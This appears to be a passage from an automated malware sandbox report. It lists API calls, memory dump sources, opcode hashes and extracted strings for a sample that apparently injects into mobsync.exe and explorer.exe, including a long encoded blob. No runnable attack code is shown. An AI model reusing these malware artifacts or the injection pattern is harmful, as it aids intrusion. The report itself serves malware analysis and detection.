                                                                                                                                                                    Commandline:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Imagebase:0x7ff7a9780000
                                                                                                                                                                    File size:97792 bytes
                                                                                                                                                                    MD5 hash:99D4E13A3EAD4460C6E102E905E25A5C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Code Analysis

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.305575200.00007FFAEEB30000.00000040.00000001.sdmp, Offset: 00007FFAEEB30000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleCtrlHandler
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1513847179-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.305575200.00007FFAEEB30000.00000040.00000001.sdmp, Offset: 00007FFAEEB30000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleCtrlHandler
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1513847179-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M$g*M$g*M$g*M$g*M
                                                                                                                                                                      • API String ID: 0-2999530285
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: `7"$g*M$g*M$g*M$g*M
                                                                                                                                                                      • API String ID: 0-3326497758
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M$g*M$g*M
                                                                                                                                                                      • API String ID: 0-1383785244
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M$g*M
                                                                                                                                                                      • API String ID: 0-2702511974
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M
                                                                                                                                                                      • API String ID: 0-158713885
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M$g*M
                                                                                                                                                                      • API String ID: 0-158713885
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (`_^
                                                                                                                                                                      • API String ID: 0-3185946245
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M
                                                                                                                                                                      • API String ID: 0-29437398
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M
                                                                                                                                                                      • API String ID: 0-29437398
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M
                                                                                                                                                                      • API String ID: 0-29437398
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0993bab8ad592b308b72664e24c42b1c3da95f8d71dc113e0a44f2f9190db939
                                                                                                                                                                      • Instruction ID: 739ac123e15ca08138e8b0b88b32ea51f2d6982a93891f295747ac15bdcb8f3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 0993bab8ad592b308b72664e24c42b1c3da95f8d71dc113e0a44f2f9190db939
                                                                                                                                                                      • Instruction Fuzzy Hash: C121EB7290DA4B4FE7A8D729E4D237476D5EF45311B5A80B9D04EC72ABDD18EC054242
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 774d720edf62b2847b143451f325dcfd5a1a94564fcc352d420446742c65016c
                                                                                                                                                                      • Instruction ID: 08b7002f31c0cadca3c97316146e69fd19c706c0ac2c2804b0d8a0b4e33e4586
                                                                                                                                                                      • Opcode Fuzzy Hash: 774d720edf62b2847b143451f325dcfd5a1a94564fcc352d420446742c65016c
                                                                                                                                                                      • Instruction Fuzzy Hash: E7212661A4EB8A0FE759EB7CAC921747BC1EF5622075440FED04EC72E3CC09AC098742
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3fdb3d00a115e486d76670ef061dad5bc6281eee87bb8619dd2d23702bb9a4f4
                                                                                                                                                                      • Instruction ID: ed38db82d638ca2be722a81b3691aebcb7e11f3393a4ad01927a8b83955cab81
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fdb3d00a115e486d76670ef061dad5bc6281eee87bb8619dd2d23702bb9a4f4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4001677111CB0D8FDB44EF0CE491AA6B7E0FB95324F10056EE58AC3651DA36E882CB46
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0c8810024e4af480a083d2fe61e41b1d8a9f5e6816d9252a5339f6589b4756a0
                                                                                                                                                                      • Instruction ID: 7d2bfdf7f0e1e10868d3796baabe95b23c23115a1289289c9039cb5a35b04ac9
                                                                                                                                                                      • Opcode Fuzzy Hash: 0c8810024e4af480a083d2fe61e41b1d8a9f5e6816d9252a5339f6589b4756a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 01F05220A0CA890FE78AF33CC4A8AA07FD1EF9E26070A41E7C00CCB257D958D844C382
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 717c9ff8582322eebd10bd171a6c38ee24b1203720702e6c7f199863d304c7f4
                                                                                                                                                                      • Instruction ID: ba772a264b0227205668d878b0a63677fc3b093623b9f7fe697bc06979844dbe
                                                                                                                                                                      • Opcode Fuzzy Hash: 717c9ff8582322eebd10bd171a6c38ee24b1203720702e6c7f199863d304c7f4
                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0303275C6044FDB4CAA1CF8429B5B3D1EB99320B00416EF48BC2696D927E8428A86
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0d73b094f9b4e20837e75eafbcb31c8d1b4e74f103a5b7c92f5cf9b3bc6007af
                                                                                                                                                                      • Instruction ID: e930060029953a390b40b94d53b4c41f9afed659a293dafec8793e1a3ee97e4a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d73b094f9b4e20837e75eafbcb31c8d1b4e74f103a5b7c92f5cf9b3bc6007af
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0303275C6044FDB4CAA1CF8429B5B3D1E799324B00016EE48BC2656D926E8438A85
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 480973e80ee74dee2b71f11aa8fdd2b8fbe3c49a145209bbddfd1737db06c102
                                                                                                                                                                      • Instruction ID: d4549ef085477bfbd6c2e0f7d817d3d185a6aad4fb65326e00ffc4633ad13c36
                                                                                                                                                                      • Opcode Fuzzy Hash: 480973e80ee74dee2b71f11aa8fdd2b8fbe3c49a145209bbddfd1737db06c102
                                                                                                                                                                      • Instruction Fuzzy Hash: BEF02B3180C6894FDB06DF6498595D57FA0FF16310F0942DBE44CC70A2DB649558C782
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 11a0e7faec8f03330d6f1e9564aac612fdacc6e931a0608201264916d93b2d2a
                                                                                                                                                                      • Instruction ID: 4c20a6fbaba1d69c61e1ca03ded5042232274d5fc5a30ece9000834711698493
                                                                                                                                                                      • Opcode Fuzzy Hash: 11a0e7faec8f03330d6f1e9564aac612fdacc6e931a0608201264916d93b2d2a
                                                                                                                                                                      • Instruction Fuzzy Hash: EEE08C31810A0C8F8B44EF18D8099EAB7E0FB29305B01429BF80ED3120DB31AA58CBC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions


                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: @&$P&$`&$h'$p&$x'
                                                                                                                                                                      • API String ID: 0-389033552
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (e$8e$He$Xe$he
                                                                                                                                                                      • API String ID: 0-740755560
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • @, xrefs: 00007FF686043096
                                                                                                                                                                      • C:\Windows\System32\mobsync.exe, xrefs: 00007FF68604303C
                                                                                                                                                                      • FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj, xrefs: 00007FF686043240
                                                                                                                                                                      • explorer.exe, xrefs: 00007FF686042F76
                                                                                                                                                                      • R]7, xrefs: 00007FF6860433CB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Window$Concurrency::cancel_current_taskConsoleMitigationPolicyProcessShow
                                                                                                                                                                      • String ID: @$C:\Windows\System32\mobsync.exe$FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj$R]7$explorer.exe
                                                                                                                                                                      • API String ID: 4262344479-4185684469
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3638128798-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                      • API String ID: 2742660187-2031265017
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3548387204-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF68605AC55,?,?,8000000000000000,00007FF686056A2D,?,?,?,?,00007FF68605AE29), ref: 00007FF68605ADE1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3527080286-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF686061AFD
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF686061B38
                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF68605386C), ref: 00007FF686061B7D
                                                                                                                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF68605386C), ref: 00007FF686061BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                      • API String ID: 2136749100-905460609
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
